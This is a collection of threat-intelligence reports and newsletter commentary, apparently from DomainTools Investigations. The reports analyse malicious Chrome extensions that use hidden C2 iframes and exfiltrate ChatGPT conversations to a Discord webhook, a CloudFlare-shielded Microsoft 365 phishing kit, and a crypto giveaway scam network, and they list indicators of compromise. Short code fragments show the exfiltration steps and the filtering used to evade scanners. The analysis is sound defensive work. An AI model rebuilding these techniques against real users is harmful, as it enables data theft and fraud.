Read all tab URLs, reload arbitrary tabs
Local + sync storage access
Full Chrome DevTools Protocol — attach to any tab, intercept network, execute arbitrary JS, capture page content
Trigger file downloads
Access to every webpage
241KB JS injected into every page
External websites can directly control the extension
Install: Phone Home + Force Inject Gemini
Event Telemetry — POST to C2
Storage Proxy — Remote Read/Write/Delete
The external website appbox.space has full remote read/write/delete access to the extension's Chrome storage. This is a remote-control storage proxy. The attacker can manipulate any persisted data without the user's knowledge.
An invisible iframe (0×0 pixels, zero opacity) is injected into every page, loading remote content from the attacker's C2 server (appbox.space/paywall/502). The user ID is passed as a URL parameter for tracking. This matches the exact technique documented by LayerX in February 2026 — but using new infrastructure (appbox.space instead of tapnetic[.]pro).
Bidirectional postMessage Communication:
Paywall Object — Remote Control Interface
Overall, the "AI Chat to PDF" extension presents itself as a utility for exporting Google Gemini conversations to PDF format, and it does technically provide that functionality using Chrome's Debugger API to attach to tabs and invoke Page.printToPDF. However, beneath this legitimate surface, the extension operates as active malware. A 241KB content script is injected into every webpage the user visits, and on Gemini-related pages, it deploys a hidden, zero-pixel iframe loading remote content from the attacker's C2 server at appbox.space/paywall/502. This invisible iframe enables bidirectional communication via postMessage, allowing the attacker to push paywall modals that attempt to charge users for access to Google's free Gemini service. Simultaneously, a MutationObserver continuously monitors the page DOM, systematically cataloging all AI conversation messages with tracking attributes for potential extraction.
Beyond the iframe injection, the extension establishes a full remote-control channel via its background service worker. This service maintains persistent connections from appbox[.]space, POSTs user event telemetry (including a persistent UUID and hardcoded campaign identifier "wallId: 502") to the C2's tracking API, and, most critically, acts as a storage proxy. This allows the external website to remotely read, write, and delete arbitrary keys in the user's Chrome storage via a Supabase authentication protocol. The manifest also reveals externally_connectable access for the C2 and a development server left in the production build. Published under the whitelab.studio umbrella (the same group behind the fake Google Authenticator), this confirms a "mixed-stage" portfolio where the actor maintains some clean apps to build a user base while others carry fully operational AiFrame-style payloads.
Whitelab’s Convert Heic to jpg Extension
Looking at other extensions from the whitelab[.]studio domain:
Name: convert-heic-to-jpg
Publisher: heic-to-jpg[.]pro
Publisher Email:
tapnetic307[@]gmail[.]com
convertheic2jpg[@]gmail[.]com
Google Web Store ID: nmijijenojhiaohkfedfgchgbmjnfcpp
Description: Convert HEIC to JPG swiftly & privately. Process unlimited files without server uploads. Secure and rapid conversion.
C2: onlineapp[.]pro
Yandex Tracker: 96330078 on heic-to-jpg[.]pro lure domain
The extension has a hidden Iframe
Uses onlineapp[.]pro — the original AiFrame C2s from the February 2026 LayerX report, still active.
Shadow DOM evasion — the iframe is hidden inside a Shadow DOM element (.shadowRoot), making it invisible to standard DOM inspection and most browser extension security scanners.
C2 command execution — the "redirect" command lets the C2 server open any arbitrary URL in the user's browser.
Triple-Redundant C2 Origin Validation
Domain pivots
Overlaps from whitelab[.]studio:
Website Title: Tapnetic | Tap into the future, powered by innovation.
Server Type: nginx or vercel
IP ISP: Vercel Inc
Name Server Domain: porkbun[.]com
Registrar: Porkbun
Email Domain: cloudflare[.]com
whitelab[.]studio
sidenox[.]stream
sidentica[.]app
softnetica[.]com
A look at sidenox[.]stream site:
Sidenox is similar to the whitelab[.]studio site in many ways including the use of Russian language comments and mentioning apps developed but it does not provide direct links or references to those apps like whitelab did.
The apps Sidenox claims to have developed are broader including healthcare and mobile apps,going beyond the AI and file conversion apps we’ve identified directly in this cluster so far.
AI Chat Platform: A multi-model chat application (supporting GPT, Claude, Gemini).
E-Commerce Platform: A marketplace with real-time inventory and Stripe integration.
Healthcare Dashboard: A HIPAA-compliant analytics dashboard.
Mobile Apps: The text mentions they build native and cross-platform apps for iOS and Android using React Native and Swift.
A look at the old C2: Tapnetic | Tap into the future, powered by innovation – tapnetic[.]pro
claude.tapnetic[.]pro, a facebook tracking pixel is used: “762928773371443”
Subdomains of tapnetic[.]pro
api.tapnetic[.]pro
www.tapnetic[.]pro
xai.tapnetic[.]pro
bard.tapnetic[.]pro
grok.tapnetic[.]pro
llama.tapnetic[.]pro
claude.tapnetic[.]pro
gemini.tapnetic[.]pro
gemini.google.tapnetic[.]pro
chat-ai.tapnetic[.]pro
chatgbt.tapnetic[.]pro
chatgpt.tapnetic[.]pro
chat-gbt.tapnetic[.]pro
deepseek.tapnetic[.]pro
ask-gemini.tapnetic[.]pro
chat-bot-gpt.tapnetic[.]pro
grok-chatbot.tapnetic[.]pro
authenticator.tapnetic[.]pro
asking-chat-gpt.tapnetic[.]pro
deepseek-to-pdf.tapnetic[.]pro
chat-with-gemini.tapnetic[.]pro
The Authenticator subdomain was first seen 2026-02-06 while the rest were active at least before 2025-08. The timing appears to line up with the public reporting of this C2 and the actor’s apparent pivot to the newer infrastructure detailed in this report.
Overlaps from appbox[.]space
Appbox[.]space was seen in multiple extensions with an iframe used for C2 such as in the following sample code:
Website Title: AppBox — Platform for Processing Tokenized Requests
It is concerning to see so many of the previously reported malicious extensions still being hosted by Google’s Web Store and multiple registrars. Google in particular should be expected to have the capacity to use AI for security application of vetting these extensions and current AI capabilities would be more than adequate to identify these extensions.
Considering the scale of these extensions in at least many dozens, the persistent behavior of the actor behind them going back as early as 2024, and the potentially hundreds of thousands of impacted users, this highlights the need for more expeditious identification and disruption actions against malicious applications and infrastructure.
Across the extensions examined, a consistent operational pattern is evident: utility software is published with legitimate functionality to attract a user base, while the underlying permissions and architecture are designed to support capabilities far beyond what the stated purpose requires. In two of three cases shown in this report, those capabilities are already active; the third—the authenticator—appears to be a "sleeper" awaiting remote activation. This developer portfolio blends clean and compromised extensions within the same storefront, a technique specifically designed to obfuscate risk and bypass the automated review systems of the Chrome Web Store.
The attribution to the AiFrame campaign rests on multiple independent indicators, including developer contact info, C2 domains, and specific paywall code patterns that converge on the same operation documented months earlier. Notably, the original command-and-control domains remain active and are still being utilized by extensions under the new branding, indicating that previous public disclosures failed to disrupt the infrastructure. With the introduction of unreported fallback domains and a new generation of C2 architecture, the actor is clearly investing in long-term resilience. At least five additional extensions in this portfolio remain unexamined and should be treated as potentially compromised.
From Gramsci's 'morbid symptoms' to modern threat intelligence - a cybersecurity roundup exploring why defenders should treat root causes over chasing dramatic threats, with curated links on ransomware, HUMINT, disinformation, and more.
“The old world is dying, and the new world struggles to be born; now is the time of monsters” - so spoke Italian political theorist Antonio Gramsci nearly one hundred years ago. Or, to be more accurate, around 1930 Gramsci wrote:
La crisi consiste appunto nel fatto che il vecchio muore e il nuovo non può nascere: in questo interregno si verificano i fenomeni morbosi piú svariati.
which has been translated directly as:
The crisis consists precisely in the fact that the old is dying and the new cannot be born; in this interregnum a great variety of morbid symptoms appear.
The vigilance of defenders and investigators often focuses on monsters, typically ones easy to classify and thus easy to articulate wins to management.
What would our industry look like if instead, we triaged the morbid symptoms of our environments, of our systems? Fighting dragons feels more satisfying than covering fundamentals. How do we frame the problem, get exec on-side, but more importantly, how do we continue to motivate ourselves in a world so seemingly full of morbid symptoms, most outside our control?
Answers usually don’t survive first contact with reality. For my part, I fall back on a mindfulness of effort. As I plan and execute, my work of 2026 includes asking myself over and over, “Am I chasing monsters, or is there an underlying morbid symptom here that means monsters spawn less, or elsewhere?”
Kentik - Internet and Airstrikes: Tracking Iran's Extended Communication Blackout - This is a deeply interesting post to me. Unsurprisingly, we’ve got a good vantage point for internet visibility, and are still working with data from 2/28 onward to better understand what’s taking place. There’s substantial value in being able to visualize negative space, though this is often forgotten amidst the rush to categorize the seen instead.
Image above from Kentik post identifying distinct shutdown phases.
We’ve been busy little gremlins, recently, and our ability at DomainTools Investigations to remain timely and relevant despite being a scrappy little team continues to make me deeply proud. From us over the past month or so:
DTI - DPRK Malware Modularity: Diversity and Functional Specialization - Our industry does well at analyzing individual malware strains. What if we looked at a more holistic picture, though? What if we looked at all the current tracks together, what would it tell us?
DTI - CloudFlare Anti-Security For Phishing - Shorter piece on some veeeery interesting anti-analysis technicals amidst a larger phishing campaign.
DTI - OpenAI Anti-Ads Malware - That browser plugin offering to block ads server by OpenAI’s free tier might not be as convenient as you think it is…
Stay protected against the "ChatGPT Ad Blocker" malware. This investigation reveals how a malicious Chrome extension uses Discord webhooks to steal private ChatGPT conversations, prompts, and metadata.
This report details the discovery of a malicious Chrome extension, named "ChatGPT Ad Blocker", found on the Google Chrome Web Store. The extension,linked to the GitHub ID krittinkalra (also linked to AI4ChatCo and Writecream), masquerades as an ad-blocking tool but is primarily designed to steal the user’s ChatGPT conversations data by systematically copying the HTML page and sending to it to a webhook on a private Discord channel.
The identified activity appears to be an attempt to capitalize on OpenAI's policy shift to serve advertisements on its free tier by distributing malicious extensions that allege to block these ads.
While the three domains identified with the website above were not fully functional at the time of discovery, in that they did not have a working pointer to the extension file, two newly created extensions by the same name and theme were found on Google’s Chrome Web store for extensions.
Extension Name: ChatGPT Ad Blocker Extension ID: ipmmidjikiklckbngllogmggoofbhjikgb Created: February 10, 2026 Developer: krittinkalra (GitHub ID: 6893033)
Email Domain: ai4chat[.]co
Malicious Extension
Upon installing the extension chrome.runtime.onInstalled fires immediately.
This calls updateRules() to fetch remote configuration that creates a persistent alarm: chrome.alarms.create("fetchRules", {periodInMinutes: 60}) and fetches from: `https[:]//raw.githubusercontent[.]com/krittinkalra/chatgpt-ad-blocker/main/rules.json`
The alarm triggers every 60 minutes: chrome.alarms.onAlarm.addListener()and re-fetches rules.json with cache-busting: RULES_URL?t=${Date.now()}. This ensures the browser never caches configuration and would enable the attacker to remotely change the behavior of the extension without user knowledge.
When the user browses to ChatGPT, the content.js script is injected, loading stored rules from chrome.storage.local. The current configuration was found to have the Ad-blocking function disabled. Instead, it registers a message listener for exfiltration trigger: chrome.runtime.onMessage.addListener()
The primary purpose of the extension appears to be data harvesting.
It appears to do this from popup.js → content.js scripts in which popup.js sends messages to content.js script: chrome.tabs.sendMessage(tab.id, {action: "GET_SANITIZED_HTML"}). The content.js script then calls getSanitizedHTML(). This function clones the entire DOM document.body.cloneNode(true) , removes rendering elements (scripts, styles, images) but preserves the text/structure of the page. It then walks text nodes, redacts only text > 150 chars if (node.nodeValue.length > 150) and returns full HTML structure with short text intact to popup.js script.
With the prompt content from the page, popup.js then sends the captured user data to sendReport() function popup.js - sendReport(), which creates a discord embed payload content: "**New Ad Report Received**" by converting the captured HTML to Blob new Blob([htmlData], {type: 'text/html'}), builds FormData with file attachment formData.append('file', blob, 'page_dump.html') and posts to a hardcoded Discord webhook.
Having identified the suspected Github content retrieval as part of the extension’s core logic, we investigated the account “krittinkalra” as possibly associated with this activity and noted a trend in past projects leading up to the identified malicious application. As a disclaimer, we are not attributing the alleged persona in the identified account but instead following a lead about the account itself.
GitHub Account Age: ~12 years (created ~2014)
Previous Activity: Android kernel development (C/C++, 2014-2020)
Activity Gap: 5+ years dormant (October 2020 - February 2026)
Skill Pivot: C/C++ kernel developer → JavaScript malware (no transition)
The link to Github alias “krittinkalra” is also linked to the extension on Chrome Web Store and X (formerly Twitter). On X, the persona stated they also created AI4ChatCo and Writecream.
Writecream alleges to generate marketing content, sales emails, blog articles, and stunning visuals in seconds with AI. AI4ChatCo alleges it is an AI platform integrating models like ChatGPT and Stable Diffusion to offer advanced chatbots, content generation, and workflow automation for over 1.5 million users worldwide.
It begs the question, is there similar user data theft, privacy violations, and malware in those apps?
Conclusion
Ads aren’t normally what we want to see, but malware and our private data and conversations being stolen is certainly lower on the list. This identified activity appears to be positioning to take advantage of the dramatic shift in OpenAI’s policy to serve up advertisements to its free tier users by distributing malicious Chrome extensions alleging to block ChatGPT ads. Specifically, the extension's primary purpose is data harvesting—stealing the full conversation structure, user prompts, and metadata—and exfiltrating it via a Discord webhook. Again, it begs the question, does the risk extend to other apps created by the same developer persona, krittinkalra, like AI4ChatCo and Writecream, which warrants further investigation into similar user data theft or privacy violations.
Security Advisory:
Be Skeptical: Treat any extension, especially those that promise to block ads on high-value sites, with extreme suspicion and scrutinize its requested permissions.
Investigate Related Services: Due to the developer's suspicious activity treat the affiliated services, AI4ChatCo and Writecream, as potentially compromised until proven otherwise.
Caution with Out-of-Band Services: Be extremely cautious with out-of-band AI services, such as those acting as intermediaries, resellers or add-ons. There is no guarantee they are acting in your best interest regarding your privacy and security and are well positioned to read and/or modify your conversations.
SecuritySnack - CloudFlare Anti-Security For Phishing
A Microsoft 365 credential harvesting campaign is exploiting CloudFlare's anti-bot and human verification features to evade detection. Learn how attackers use IP blocklists, user-agent filtering, and obfuscated scripts to bypass security scanners—and what it means for the industry.
Service platforms that provide protection and content delivery, like CloudFlare, have become a go-to for many web service hosts—including some malicious actors. These platforms offer inherent benefits like obfuscation, anti-bot, and anti-scanner tools. While excellent for defending legitimate customers, these very features can inadvertently shield malicious sites from proactive identification by security professionals and automated scanning services. This creates a challenging dynamic in the industry where a service provider's role in protecting its customer base competes with the broader community's need for effective security scanning.
This report details a recent Microsoft 365 credential harvesting campaign that leverages this dynamic to delay detection and risk profiling. The campaign implemented multiple anti-detection techniques including the use of CloudFlare human verification, hardcoded IP block lists, user agent checks, and multiple sites and redirects. This cluster highlights the need for service providers to consider taking on an even greater responsibility in knowing their customers and ensuring their defensive capabilities are not being abused to actively protect malicious actors.
Details
securedsnmail[.]com
https[:]//securedsnmail[.]com/secdex.html
Gatekeeping and redirection paths
The site code contains a few layers of gatekeeping to ensure the visitor is a real target and not a security tool.
CloudFlare Human Verification: There's an initial CloudFlare human verification check and redirection.
Aggressive IP and User-Agent Filtering: The site code fetches details about the visitor's IP using https[:]//api.ipify[.]org/?format=json and checks it against a hardcoded blocklist. This list includes ranges belonging to major security companies (Palo Alto, FireEye) and cloud providers (AWS, Google), as well as search engine crawlers.
It also sniffs the visitor's browser for bot-like User-Agents. If a security scanner or bot is detected (e.g., Googlebot, Bingbot, AhrefsBot, or Twitterbot), the page replaces itself with a fake "404 Not Found" message to prevent the malicious site from being indexed or flagged.
User Agent Checks:
IP Checks:
The core credential theft logic is not written in standard JavaScript. Instead, it is executed by a custom VM function (e_d007dc) that interprets an array of encoded instructions. This prevents static analysis from identifying the data-stealing parameters or the Command & Control (C2) URLs.
The framework dynamically updates its destination. When the gatekeeping checks flag, it switches the URL in the VM to a legitimate domain like Google.com, neutralizing the malicious footprint for any subsequent analysis.
Obfuscated Credential Harvesting:
If the user passes these checks, an obfuscated script builds and redirects them to the credential harvesting URL built from an obfuscated script in the following format: `https[:]//office.suitetosecured[.]com/KuPbXodA?b=cGjQKg4&auth={}`, which it then designates an auth value that is presumably used to verify and track the user passing the gatekeeper to the next stage sites.
In reviewing the multiple phishing sites identified in this campaign, a commonality in the Cloudflare turnstile configuration was observed. The Cloudflare Turnstile sitekey (0x4AAAAAACG6TJhrsuZdpjsN) is a static identifier. Specifically, the “CG6TJhrsuZdpjsN” portion appears to be the unique identifier created when a Cloudflare user sets up the Turnstile widget in their CloudFlare dashboard. Security teams could possibly pivot on this key across telemetry sources (e.g. Shodan, Censys, URLScan) to identify newly registered phishing sites before they are utilized in campaigns.
Registration Commonalities
Nameserver: cloudflare.com
Registrar: NAMECHEAP INC
mx host: registrar-servers.com
IP ISP: CloudFlare Inc.
MX Domain:
jellyfish[.]systems
registrar-servers[.]com
Conclusion
The strategic abuse of legitimate content delivery and security platforms, such as CloudFlare, by malicious actors creates a considerable obstacle to proactive security scanning and detection. The Microsoft 365 credential harvesting campaign described in this report, which also employed multiple anti-detection mechanisms, shows how these defensive features can inadvertently shield malicious sites, delay their detection, and hinder informed risk assessments. To address this evolving dynamic, service providers should accept greater responsibility in knowing their customers and ensuring their platform's security capabilities are not leveraged to actively protect malicious campaigns.
A broken snowblower belt taught me something cybersecurity professionals often forget — saying "I don't know" isn't failure. It's where the real work begins.
I’ve never touched a motor before in my life.
This is about cybersecurity, I promise. Bear with me a minute.
The ground outside the DTI Boston Satellite Office (my living room) is thick with snow. We had it easy through most of January, and then multiple blizzards. And after the first one, a piece of ice lodged in the auger of my snowblower, and the impeller belt ripped itself apart.
Deciding I could replace the belt myself involved a bit of hubris, in retrospect. Because as noted, I’ve never touched a motor of any type before in my life. So it should not have been a surprise when I found myself sweating over the guts of my snowblower on a Thursday night trying to force the belt into place.
It didn’t help that my machine included a third wheel of sorts, a tensioner that didn’t exist in any manual or online video about replacing the impeller belt in my exact model. But a life of spreadsheets and threat hunting did not prepare me for motor mechanics, oddly enough.
So I reached out. Because I didn’t know, and while I tried to brute force it, and research it, nothing worked. I tried to bribe the belt into place, and threaten it, and cajole it. None of this resulted in the least amount of progress, and so I asked for help.
There’s still a stigma in admitting you don’t know something in infosec; “information” is in the name, after all. And the sentence “I don’t know” is treated as a failure. But what we need to do is treat it as a starting point instead; “I don’t know, yet.”
I articulated the problem and showed my work. A few minutes later came a reply: “Oh. So. What you need to do is…”
And a few minutes later the snowblower was running like new.
Be the person that reaches out for help when you need it, and show this industry that’s okay. But also be the person that answers when you can, to show each other we’re not alone.
Articles
Almost feel like I need to add an extra section just for Google Threat Intelligence Group - they’ve spent the past few weeks putting out piece after piece of great intel. As always, grateful for folks sharing like this.
Lots of other good reading out there this month, though, too:
Infoblox Threat Intel - Compromised Routers, DNS, and a TDS Hidden in Aeza Networks - One of the best DNS investigation posts I’ve ever read, and I’ve read a lot of them. Infoblox TI not only provides the results of their research, but shows in-depth steps on how to recreate it by eliciting responses from secretive recursive servers, for example.
Gitlab Threat Intelligence - GitLab Threat Intelligence Team reveals North Korean tradecraft - Excellent deep dive into both the fraudulent enterprise IT worker threat and the Contagious Interview campaign, the latter of which targets job applicants for compromise.
Symantec/Carbon Black Threat Hunter Team - North Korean Lazarus Group Now Working With Medusa Ransomware - The brevity here is respectable - it’s actually a very information-dense post with some deeper implications for DPRK-targeted ecospheres.
Research Papers and Reports
Crowdstrike - 2026 Global Threat Report - Heavy on the AI stuff, which I am always skeptical of, but I haven’t dived deeply into the guts here yet.
Tools and Resources
PulseBeat02 - yt-media-storage - Encodes any data into lossless video styles to store on Youtube, and decodes them into the original data, for exfiltration etc. I suppose if you can store a PNG on a starling, you can exfiltrate crown jewels via youtube.
An analysis of an active cryptocurrency scam operation impersonating Trump, Musk, and Truth Social across 250+ domains — uncovering shared wallet infrastructure, on-chain laundering pipelines, and the tactics used to fake legitimacy.
In the past few years, some public figures including President Donald Trump and Elon Musk began promoting investments in various crypto currencies named in their likeness or that they were prominent holders of on their social media platforms they own, Truth Social and X (formerly Twitter) respectively. $TRUMP coin for example was created on January 17, 2025 and endorsed by the official Trump Truth Social account. Likewise the $WLFI coin, in which Trump and his children are listed as co-founders and executives. $MELANIA similarly was endorsed by official Melania Trump posts on X platform. The list goes on, earning Trump the title of “Crypto President”. Elon Musk has had a longer history of high profile endorsements of crypto currency. In fact, repeated posts about pushing his viewers on X to invest in Dogecoin for example led to him calling himself the “Dogefather” on Saturday Night Live. As these figures have made posts promoting or endorsing these currencies, threat actors have begun spoofing these endorsements and promotions to trick users into crypto scams. They spoof the real social media pages and posts and promote crypto currency much like the real personas do but for their own gain.
This report documents the analysis of a cryptocurrency scam operation. The operation has been active since at least January 2025 and spans roughly 250 identified domains across multiple scam themes. Nearly all target retail crypto users, but use different approaches to get their money.
Details
The investigation started with an identified set of 60 suspected scam domains sharing the same Google analytics tag ID. Upon scanning them and extracting wallet addresses from the ones that were live, we then verified those wallets against blockchain APIs, and attempted to trace the funds. That work uncovered the first campaign, a network of fake celebrity crypto giveaway sites. A shared actor wallet address and domain registration pattern then led us to a second larger set of more technical scam configurations involving fake token presale sites impersonating a wide variety of real blockchain projects.
Idol Scam Templates:
Idol scam template set is a collection of sites impersonating Elon Musk, Donald Trump, and Truth Social, all pushing the same basic pitch: send crypto and get double back. About 11 of the 60 domains were active with extractable wallets. Several share a common nameserver infrastructure at streetplug[.]me.
On-chain, the picture was straightforward. The two most active BTC wallets received a combined ~1.5 BTC, but tracing showed all of it came from a single central funder address — not from victims. The actor was likely sending money to themselves to inflate the on-chain transaction history and make the wallets look active. A bridge address connected both wallets with a dust transaction, confirming single-actor control. Downstream, the funds moved through a 5-layer laundering pipeline ending at high-volume mixing or OTC services, some with hundreds of thousands of transactions and multiple fraud flags. One of the upstream wallets was previously reported as being owned by ChangeNow.io, a cryptocurrency swap service that allows transactions to happen wallet-to-wallet instead of involving an exchange like CoinBase or Binance. The pipeline predates this campaign. The intermediary addresses have activity going back to May 2024 with hundreds of transactions, which we suspect is an indication this infrastructure has been used for other operations previously.
We found no confirmed victim deposits in the wallets we could trace, but that doesn't mean there are no victims. The actor may use different receiving addresses than the ones displayed on the sites, or victims may exist in transaction history we couldn't access. However, what we can confirm is that the on-chain activity we traced is the actor moving their own money around.
Example scam sites “trump4u[.]org” and “trumppresent[.]top” masquerade as Truth Social posts by President Trump that purports to have signed an executive order to hand out cryptocurrency rewards to those that click the links. While it is true that President Trump has officially established a Strategic Bitcoin Reserve and a U.S. Digital Asset Stockpile, the specific posts are designed to look like related Truth Social posts to trick users into participating in a fraudulent giveaway.
Similar scam sites spoofs as a Medium platform page and masquerade as a user named “Elon Musk” such as the following screenshot of “usaevent[.]live”.
Other scam variations show Elon Musk alongside an “X” logo purportedly endorsing a Casino related site with a reward for signing up.
One of the scam’s instructions:
In each of these examples, multiple layers of incentives and ploys are used to appear legitimate and pressure site visitors into being conned by the scam..
Incentives:
Fake Comments:
Fake Transactions generated by code on a hardcoded interval
The endgame of the scam is to convince site visitors to click on any of the three links and send money from their wallet. Links to other pages with crypto wallet addresses.
Example: trumpbtc[.]top/btc/index.html from Trump variation
Example: usaevent[.]live with 1musk novelty address variation
Exchange Spoof / Token Presale Drain Templates:
The second style of templates use a less direct transfer style scam approach and instead masquerade as legitimate exchanges. An example is the scam site magaeth[.]bid, which impersonates MegaETH, a real Layer 2 blockchain project, using a cloned website template from bio[.]xyz. Instead of asking victims to manually send crypto, this site connects to their MetaMask wallet and initiates transactions through what looks like a smart contract interaction. Similar to the other templates, these scams also work by using various incentives to trick users into connecting their wallets. They typically appeared to use more dynamically loaded wallet exchanges instead of hardcoding like the other template examples.
The "contract" address in this example (0x134685b581EE7d987c3Caf998CA93CF31BA4Ce10) is just a regular Ethereum wallet, an EOA (Externally Owned Account) with no deployed code on any chain. The following wasn’t fully verified but we suspect the site's JavaScript constructs Web3 contract calls with a full ABI, but when those calls hit the EVM (Etherium Virtual Machine) targeting an EOA, the chain just transfers the ETH (Ether, the native cryptocurrency in Ethereum ecosystem) value and ignores the rest. The victim sees a successful transaction and thinks they bought tokens. In reality, their ETH went straight to the scammer's personal address.
We suspect the site also has two theft mechanisms. One being a presale form that takes whatever amount the victim enters, multiplies by 0.985, and sends it to the scammer. The second being an airdrop withdrawal function that reads the victim's entire wallet balance and sends nearly all of it. If the victim doesn't have enough to be worth draining, the site tells them to deposit more first.
From this scam site, magaeth[.]bid, we suspect there were two victim transactions on Ethereum mainnet totaling 0.1521825 ETH (~$300). Both carried the buyTokens() function selector in their input data, and the first transaction's value (0.0985 ETH) matches exactly what the code would produce from a 0.1 ETH input (0.1 × 0.985). Both senders appear to be real retail users. As of finishing this investigation, the funds haven't been moved.
These sites mimic a crypto exchange giveaway, displaying Elon Musk and/or Donald Trump branding. Victims are told to send crypto to receive double back.
Three wallets use a "1musk" vanity prefix — the actor generated BTC addresses starting with "musk" to reinforce the Elon Musk impersonation. Sites share common decoy addresses in HTML (invalid/truncated strings used as visual filler).
Cluster 2: "Truth Social" Template (4 domains)
Replicate the Truth Social interface with fake posts attributed to Trump about crypto policy or giveaways.
Self-Dealing
Looking up these wallets using open services like blockchain[.]com, we can see transactions to and from the wallet addresses on the scam sites. In some cases it gives the appearance that more than 40k USD worth of transactions had been sent to or from the scammer’s wallets.
Example scammer wallet transaction history:
However, on closer inspection in chain analysis, we see these transactions are from wallets likely controlled by the scammer and are intended to trick users into thinking they are legitimate wallets.
Transaction tracing revealed the on-chain BTC activity is the actor sending money to themselves, not real victim payments.
Single funding source
Scam Wallet 1 received from exactly one sender (central funder). Zero external deposits.
Same funder, two campaigns
Central funder sent wallets on multiple different scam domains
Bridge cross-link
15aeJcFdBD... received 0.269 BTC from Scam Wallet 1, then sent 0.00006 BTC dust to Scam Wallet 2. Direct on-chain link.
Drain convergence
Both scam wallet chains funnel into bc1qp4v9mj...
Rapid drain pattern
Funds moved out within hours of deposit
In this example, all recent inbound transactions were from a single sender, rUg8ac5ikpTaWk5RPei8xuYkNEyUs53G1i. Both sender and scam wallet share a parent Binance hot wallet, a wallet that is connected to the internet allowing for fast trading (rDAE53VfMvftPB4ogpWGWvzkQxfht6JPxr, verified binance.com, 115M XRP). The pattern is consistent with self-transfers between Binance sub-accounts used by the scammer.
Chain Analysis
Starting from the scam wallets, funds were traced upstream (funding source) and downstream (drain destinations) through 5 layers of addresses.
Actor Wallet Pipeline:
Circular flows: Drain 2 sends to Musk Drain, which sends back to Convergence Drain. Bridge sends back to Drain 2. This tangles the trail.
Bridge cross-link: The dust transaction from Bridge to Scam Wallet 2 is the definitive on-chain proof connecting both scam campaigns.
Prior activity involving what are suspected to be the scammer’s wallets suggests that this pipeline was not built for this one campaign and has considerations for larger scale.
Convergence drain has 229 txs dating to May 2024.
Prior scam node bc1q0qc892... has 723 txs (transactions).
The intermediary, 16mJhtpey…, has 1,276 txs.
Single-destination aggregator: 16mJhtpeyctW... has 1,276 txs but sends to exactly one address. This is either automated or purpose-built for batching before passing to a mixer.
Registration patterns and website configurations had multiple commonalities. A common google analytics tag was used across approximately 50 of the scammer’s sites as well as a registration email address.
Registration Patterns:
Trackers:
Google:
G-NK9V3KPEY4
G-YSMK4G52CC
G-5Z0ZNNED69
GTM-PL3G78C
G-R1QQ1Z50QZ
G-WRPVL3G32L
269367857
Matomo:
hxxps://x2025.matomo[.]cloud/
https://25elon.matomo[.]cloud/
Hotjar: 4997593
Statscounter Security: f1980b9f
Emails:
seunexseun[@]gmail[.]com
juliambaldwin777[@]gmail[.]com
ddogenews3[@]gmail[.]com
diana.lopez88866[@]gmail[.]com
brainyworld10[@]gmail[.]com
fsdoplfsdopfsd[@]proton[.]me
feliciaevanslong777[@]gmail[.]com
ervins_cudara86[@]outlook[.]com
konrads_celms30[@]me[.]com
zanis_latkovska[@]aol[.]com
Website Titles:
Elon Musk — Official BTC, ETH & DOGE Giveaway!
Truth Social
LitEnergy — Official Crypto Event
NEAR Protocol | Pool Event
MegaETH | The First Real-Time Blockchain
Monad | The Most Performant EVM-Compatible Layer 1 Blockchain
USA X Crypto Giveaway
Elon Musk — X Crypto Giveaway
Exchange | PancakeSwap
Lottery | PancakeSwap
Hasbulla
Initia
Home - Kaspa
Earn and Borrow Crypto | World Liberty Financial
NEAR Protocol | Pool Event
BIO Protocol - Listing on Binance Launchpool
BIO • Home
Solv Protocol - Stake your Bitcoin today!
ELSKTRADING | Welcome to ELSK Trading
MX IP: 5.189.161[.]88
The following are screenshot samples of the various scam sites associated with this activity. Notably all are overtly crypto related with one exception, an alleged virtual machine resource for AI Agents that could be “claimed” by applying from the site “avm-code[.]com”. That exception has been taken down by Cloudflare for phishing activity:
Conclusion
This investigation mapped a cryptocurrency scam operation spanning roughly 250 domains, two distinct theme types, and at least 24 actor-controlled wallet addresses across BTC, ETH, and XRP. The operation is suspected of being run by a Russian-speaking actor and has been active since at least January 2025.
We identified two thematic campaigns linked by a shared Ethereum wallet address and registration pattern overlaps. The first is a broad network of fake giveaway and doubler sites impersonating idolized personalities. Namely Elon Musk, Donald Trump, Truth Social, as well as various crypto projects. It is distributed across three hosting clusters including bulletproof infrastructure. The second consists of more technically advanced fake token presale sites such as megaeth[.]bid, which connects to victims' MetaMask wallets and initiates transactions that look like smart contract interactions but are actually direct transfers to the scammer's personal address.
The on-chain findings were mixed. For the giveaway sites, blockchain tracing showed the actor funding their own wallets from a central source and cycling approximately 1.5 BTC through a multi-layer laundering pipeline ending at high-volume mixing services. We found no confirmed victim deposits in those wallets. For the second themed campaign we ran down a few of the many sites such as megaeth[.]bid site, in which we confirmed two real victim transactions totaling 0.1521825 ETH (~$300). We verified both through function selector matching and value calculation alignment with the scam code. Those funds remain unmoved in the scammer's wallet.
The confirmed financial impact so far from our limited scope of chain analysis is small, roughly $300 from two victims. However, the infrastructure tells a different story. There are hundreds of similar domains over the past year and the identified laundering pipeline has intermediary addresses with hundreds to thousands of transactions dating back to mid-2024, well before the current campaign. The terminal wallets at the end of the chain have transaction counts in the hundreds of thousands and carry multiple fraud flags from independent reporting databases. The actor registered hundreds of domains, set up hosting across multiple jurisdictions, generated vanity Bitcoin addresses, and built scam toolkits that work across Ethereum and Binance Smart Chain. This is not the infrastructure you build for $300. The operation is designed for sustained, repeatable use, and we are most likely seeing a narrow slice of its total activity.
The strongest investigative leads going forward sit outside of blockchain analysis. The Binance sub-account identified behind the 381,813 XRP wallet is a direct path to KYC records. The domain registration and hosting infrastructure, particularly the shared nameservers at streetplug[.]me and the EuroByte hosting cluster, could yield registrant details. Commercial chain analysis tools (Chainalysis, Elliptic) would likely have attributions for the terminal mixing wallets that our open-source methods couldn't resolve. The blockchain trail itself, by design, ends at services built to break traceability.
What we can say with confidence: a single actor controls both campaigns, uses Russian-language code artifacts, operates from infrastructure that spans France, Russia, and UK-based bulletproof hosting, and has built a wallet pipeline capable of handling significantly more volume than what we observed. The two confirmed victims on megaeth[.]bid are likely real people, one funded from Coinbase, the other a multichain DeFi user, who lost money to a scam disguised as a legitimate blockchain project. There are almost certainly more.
Commentary followed by links to cybersecurity articles and resources that caught our interest internally.
